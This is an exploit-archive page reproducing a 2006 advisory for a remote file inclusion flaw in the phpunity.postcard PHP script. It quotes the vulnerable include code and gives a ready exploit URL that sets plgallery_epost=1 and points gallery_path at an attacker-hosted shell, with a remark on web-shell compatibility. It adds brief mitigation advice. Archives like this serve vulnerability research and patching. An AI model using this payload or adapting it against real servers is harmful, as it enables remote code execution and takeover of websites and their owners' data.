header-logo
Suggest Exploit
vendor:
phpunity.postcard
by:
Rivertam
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: phpunity.postcard
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpunity.postcard (phpunity-postcard.php) Remote File Inclusion Exploit

phpunity.postcard is vulnerable to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This can result in remote code execution.

Mitigation:

Input validation should be used to prevent malicious input from being passed to the application. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.
Source

Exploit-DB raw data:

######################################################################################
#                                                                                    #
#     phpunity.postcard (phpunity-postcard.php) Remote File Inclusion Exploit        #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Affected Software .: phpunity.postcard                                         #
#     Vendor ............: http://www.perlunity.de/                                  #
#     Class .............: Remote File Inclusion                                     #
#     Risk ..............: high (Remote File Execution)                              #
#     Found by ..........: Rivertam                                                  #
#     Contact ...........: rivertam88[at]gmail[.]com                                 #
#     Discovered on .....: 04.09.2006 (dd.mm.yyyy)                                   #
#     Published on ......: 13.09.2006 (dd.mm.yyyy)                                   #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Affected File:                                                                 #
#          /phpunity-postcard.php                                                    #
#                                                                                    #
#     Vulnerable Code:                                                               #
#          if(isset($plgallery_epost)) {                                             #
#            $keep_url = "?".$_SERVER['QUERY_STRING'];                               #
#              if(isset($gallery_path)) {                                            #
#                include("$gallery_path/admin/inc/config.inc.php");                  #
#              } else {                                                              #
#                include("../../phpunity-easygallery/admin/inc/config.inc.php");     #
#              }                                                                     #
#          }                                                                         #
#                                                                                    #
#     Description:                                                                   #
#     $gallery_path is not defined before being used and in the config it is         #
#     standardly out-commentated. To get into the if request we must define          #
#     $plgallery_epost as 1 (or somethings else)                                     #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Exploit:                                                                       #
#     http://[target]/phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]?  #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Notice:                                                                        #
#     Works not with the c99-php shell cause if you use it the plgallery_epost=1     #
#     getting lost when you change dir or make another action and then the shell     #
#     unloads.                                                                       #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Greets: Rivertam [National Cracker Crew]                                       #
#                                                                                    #
######################################################################################
#                                                                                    #
#     Greets to:                                                                     #
#     Silver, DOOMER85, Betta splendens and Dye                                      #
#                                                                                    #
######################################################################################

# milw0rm.com [2006-09-13]